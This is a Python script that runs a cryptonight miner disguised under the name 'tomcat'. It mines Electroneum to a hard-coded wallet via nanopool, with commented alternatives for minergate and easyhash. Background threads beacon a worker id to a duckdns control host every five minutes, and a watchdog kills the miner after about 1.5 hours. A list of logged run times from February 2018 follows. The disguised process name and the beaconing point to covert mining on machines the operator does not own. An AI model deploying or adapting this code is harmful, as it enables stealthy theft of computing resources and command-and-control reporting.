import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:37:06.440569
#2018-02-17 16:23:05.747679
#2018-02-17 18:10:08.860056
#2018-02-17 19:58:01.670118
#2018-02-17 21:46:04.464069
#2018-02-17 23:31:04.951734
#2018-02-18 01:20:01.348753
#2018-02-18 03:07:01.316516
#2018-02-18 04:56:01.963960
#2018-02-18 06:49:06.047142
#2018-02-18 08:38:04.873098
#2018-02-18 10:24:04.823084
#2018-02-18 12:10:01.405112
#2018-02-18 13:56:01.277894
#2018-02-18 15:45:08.943753
#2018-02-18 17:34:06.820461
#2018-02-18 19:22:01.892764
#2018-02-18 21:07:01.831223
#2018-02-18 22:54:05.964407
#2018-02-19 00:42:06.178100
#2018-02-19 02:28:04.223061
#2018-02-19 04:15:03.096567
#2018-02-19 05:58:03.980334
#2018-02-19 07:46:07.701045
#2018-02-19 09:37:07.472133
#2018-02-19 11:26:05.163607
#2018-02-19 13:13:04.096366
#2018-02-19 15:02:02.142735
#2018-02-19 16:51:03.940835
#2018-02-19 18:37:08.128248
#2018-02-19 20:24:05.456823
#2018-02-19 22:13:04.081243
#2018-02-19 23:59:07.399162
#2018-02-20 01:46:06.853504
#2018-02-20 03:36:02.059327
#2018-02-20 05:22:05.649825
#2018-02-20 07:05:06.198280
#2018-02-20 08:51:06.916502
#2018-02-20 10:35:06.212161
#2018-02-20 12:21:07.707665
#2018-02-20 14:08:03.774654
#2018-02-20 15:53:16.807884
#2018-02-20 17:38:07.016449
#2018-02-20 19:26:04.202551
#2018-02-20 21:15:07.869545
#2018-02-20 23:01:05.834053
#2018-02-21 00:46:01.592778
#2018-02-21 02:32:02.144844
#2018-02-21 04:19:04.346188
#2018-02-21 06:06:01.510753
#2018-02-21 07:52:08.221148
#2018-02-21 09:36:08.415519
#2018-02-21 11:24:01.773530
#2018-02-21 13:14:06.069210
#2018-02-21 14:59:09.741134
#2018-02-21 16:48:08.531399
#2018-02-21 18:37:07.900166
#2018-02-21 20:22:01.296552
#2018-02-21 22:09:06.680448
#2018-02-21 23:59:01.769250
#2018-02-22 01:47:03.849019
#2018-02-22 03:36:04.209112
#2018-02-22 05:22:07.027802
#2018-02-22 07:08:06.982136
#2018-02-22 08:54:07.999988
#2018-02-22 10:42:07.089535
#2018-02-22 12:30:14.185202
#2018-02-22 14:16:07.650693
#2018-02-22 16:05:11.814877
#2018-02-22 17:50:15.410859
#2018-02-22 19:38:05.245824
#2018-02-22 21:29:08.830810
#2018-02-22 23:16:04.164035
#2018-02-23 01:02:01.359901
#2018-02-23 02:49:05.207729
#2018-02-23 04:37:05.739210
#2018-02-23 06:23:06.860227
#2018-02-23 08:09:05.409405
#2018-02-23 10:27:01.272960
#2018-02-23 12:20:09.091966
#2018-02-23 14:10:09.691271
#2018-02-23 15:59:01.539654
#2018-02-23 17:44:01.516071
#2018-02-23 19:32:03.251768
#2018-02-23 21:15:08.126103
#2018-02-23 23:03:07.744340
#2018-02-24 00:49:07.290564
#2018-02-24 02:40:08.930769
#2018-02-24 04:36:01.290353
#2018-02-24 06:20:06.090902
#2018-02-24 08:08:03.557181
#2018-02-24 09:52:05.346527
#2018-02-24 11:47:05.091525
#2018-02-24 13:39:01.338691
#2018-02-24 15:26:07.758067
#2018-02-24 17:16:05.893382
#2018-02-24 19:09:07.339483
#2018-02-24 20:58:05.179384
#2018-02-24 23:27:04.974880
#2018-02-25 02:49:07.163917
#2018-02-25 06:25:06.154352